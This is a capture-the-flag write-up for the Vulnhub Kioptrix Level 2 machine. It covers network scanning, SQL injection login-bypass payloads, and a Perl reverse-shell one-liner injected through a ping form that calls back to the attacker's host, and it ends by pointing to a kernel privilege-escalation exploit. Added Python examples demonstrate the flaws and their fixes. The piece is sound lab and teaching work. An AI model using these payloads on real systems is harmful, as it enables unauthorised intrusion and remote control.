
This is my second Vulnhub write-up, this time for the Kioptrix Level 2 challenge. As usual we start by enumerating services, but before that we need to find the IP address of the target machine.
Information Gathering
netdiscover will list every device connected to your network; arp-scan does the same job, so use whichever you prefer.
Arp-scan
arp-scan --interface=eth0 --localnet
Now that we have the target IP address, let's see which services are running on that server.
Nmap
nmap -oA nmap -sC -sV 192.168.1.8
These are the services running on the target machine:
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
Port 80 is running Apache httpd 2.0.52 (CentOS).
Let's take a look at http://192.168.1.8
It shows a "Remote System Administration Login" form with a username and a password field. Let's look at the page source; we might find something interesting.
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
  <table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
    <tr>
      <td colspan='2' align='center'>
        <b>Remote System Administration Login</b>
      </td>
    </tr>
    <tr>
      <td width="150">Username</td>
      <td><input name="uname" type="text"></td>
    </tr>
    <tr>
      <td width="150">Password</td>
      <td>
        <input name="psw" type="password">
      </td>
    </tr>
    <tr>
      <td colspan="2" align="center">
        <input type="submit" name="btnLogin" value="Login">
      </td>
    </tr>
  </table>
</form>
<!-- Start of HTML when logged in as Administator -->
Nothing special, but the form posts the uname and psw fields straight to index.php and nothing in the page hints at any input validation, so let's try SQL injection.
BurpSuite
Below is the request we send and the response we get back.
Request:
POST /index.php HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login
Response:
<!-- Start of HTML when logged in as Administator -->
<form name="ping" action="pingit.php" method="post" target="_blank">
  <table width='600' border='1'>
    <tr valign='middle'>
      <td colspan='2' align='center'>
        <b>Welcome to the Basic Administrative Web Console<br></b>
      </td>
    </tr>
    <tr valign='middle'>
      <td align='center'>
        Ping a Machine on the Network:
      </td>
      <td align='center'>
        <input type="text" name="ip" size="30">
        <input type="submit" value="submit" name="submit">
      </td>
      </td>
    </tr>
  </table>
</form>
So it was a simple SQL injection (1' or '1' = '1): the injected OR '1' = '1' makes the WHERE clause true no matter what credentials are stored, and the application renders the page it reserves for a logged-in administrator.
We have tested the SQL injection manually. Let's run sqlmap against the same request now.
SQLmap
It confirmed the injection point and generated a payload for us:
Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login
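To show why both the hand-written payload and the sqlmap one log us in, here is an added example (not code from the write-up or from Kioptrix) that rebuilds the login check the way a PHP app of this era typically does, by concatenating the two fields into the query, and puts a parameterised version next to it. The table name, columns and stored credentials are constructed assumptions; the real schema behind index.php is unknown. SQLite stands in for the MySQL on port 3306, since the precedence rule that matters (AND binds tighter than OR) and the `--` comment behave the same in both.

```python
import sqlite3

# Constructed stand-in for the login table behind index.php (assumed schema).
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def vulnerable_login(conn, uname, psw):
    """Builds the WHERE clause by string concatenation, as the target evidently does.
    With uname = psw = 1' or '1' = '1 the clause becomes
      username='1' or '1' = '1' AND password='1' or '1' = '1'
    which parses as  A OR (B AND C) OR D  and the trailing '1'='1' is always true."""
    query = (f"SELECT username FROM users "
             f"WHERE username='{uname}' AND password='{psw}'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, uname, psw):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (uname, psw)).fetchone() is not None


# The two payloads from the write-up, as the server sees them after URL decoding.
MANUAL_PAYLOAD = "1' or '1' = '1"             # sent in both uname and psw
SQLMAP_PAYLOAD = "-2356' OR 1260=1260-- DpYb"  # sent in uname; psw=admin
# sqlmap's version needs only the uname field: everything after "--" (including
# the AND password=... part) is commented out, and 1260=1260 is always true.


def demo():
    conn = setup_db()
    return {
        "manual_vuln": vulnerable_login(conn, MANUAL_PAYLOAD, MANUAL_PAYLOAD),
        "sqlmap_vuln": vulnerable_login(conn, SQLMAP_PAYLOAD, "admin"),
        "manual_safe": safe_login(conn, MANUAL_PAYLOAD, MANUAL_PAYLOAD),
        "sqlmap_safe": safe_login(conn, SQLMAP_PAYLOAD, "admin"),
        "real_creds_safe": safe_login(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

Both payloads log in through the concatenated query and both are rejected by the parameterised one, which still accepts the real credentials. The `'11` in the raw Burp request above works for the same reason: the `'1' = '11` comparison is false, but it sits in the middle term, and the final OR '1' = '1' still decides the clause.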
Reverse Shell
The admin page has another field, which pings a machine on the network. Testing it the same way, the value of the ip field is clearly handed to a shell, because a simple ';' semicolon lets us append a second command. This is OS command injection rather than SQL injection, and it is what gets us a shell.
So this is what I did: a valid address to keep ping happy, then a semicolon, then a Perl reverse shell back to my machine (192.168.1.9) on port 1337:
192.168.1.1; perl -e 'use Socket;$i="192.168.1.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
With nc -lvp 1337 already listening on my machine, the shell connected back.
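An added example, not the write-up's or Kioptrix's code, of the ping handler's failure mode and its fix. The real pingit.php source is not shown, so the vulnerable function below assumes only what the semicolon proves: the ip value is pasted into a command line that a shell parses. The hardened version accepts nothing but a literal IP address and passes it as one argv element with no shell in between. The injected payload uses echo instead of the write-up's Perl one-liner so it runs harmlessly offline.

```python
import ipaddress
import subprocess


def vulnerable_ping(ip):
    """Concatenates the user-supplied value into a shell command line (assumed
    shape of pingit.php). The shell splits on ';', so '127.0.0.1; id' runs ping
    and then id. -W 2 only keeps the ping short for the demo."""
    cmd = f"ping -c 1 -W 2 {ip}"
    result = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True, timeout=30)
    return result.stdout


def build_ping_argv(ip):
    """Hardened version: accept only something that parses as an IPv4/IPv6
    address, then hand it over as a single argv element. Raises ValueError on
    '127.0.0.1; id', '$(id)', '1.2.3.4 | nc ...' and any other non-address."""
    addr = ipaddress.ip_address(ip.strip())
    return ["ping", "-c", "1", "-W", "2", str(addr)]


def safe_ping(ip):
    try:
        argv = build_ping_argv(ip)
    except ValueError:
        return "rejected: not an IP address"
    # No shell=True and no string building: the address cannot become a second command.
    return subprocess.run(argv, capture_output=True, text=True, timeout=30).stdout


if __name__ == "__main__":
    # Constructed payload; the write-up appends a Perl reverse shell at this position.
    injected = "127.0.0.1; echo INJECTED"
    print("vulnerable handler output:\n" + vulnerable_ping(injected))
    print("hardened handler output:\n" + safe_ping(injected))
```

Validating with ipaddress is stricter than an escaping function such as escapeshellarg would be: it rejects the input outright instead of trying to quote it, which also closes off the other separators (|, &&, $(...), newlines) that work just as well as ';' once a shell is in the loop.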
Now we go after root.
Root
Running the LinEnum.sh script did not turn up anything interesting, but look at the kernel version: there are public exploits for that kernel.
[-] Kernel information (continued): Linux version 2.6.9-55.EL ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3.4.6 -8))
After some Google searches I found that the exploit below might work, so I gave it a try, and it actually worked. Since it is a kernel exploit, a failed attempt can crash the box, so check that the target kernel matches the version the exploit was written for and that gcc is available on the target before running it.
https://www.exploit-db.com/exploits/9545/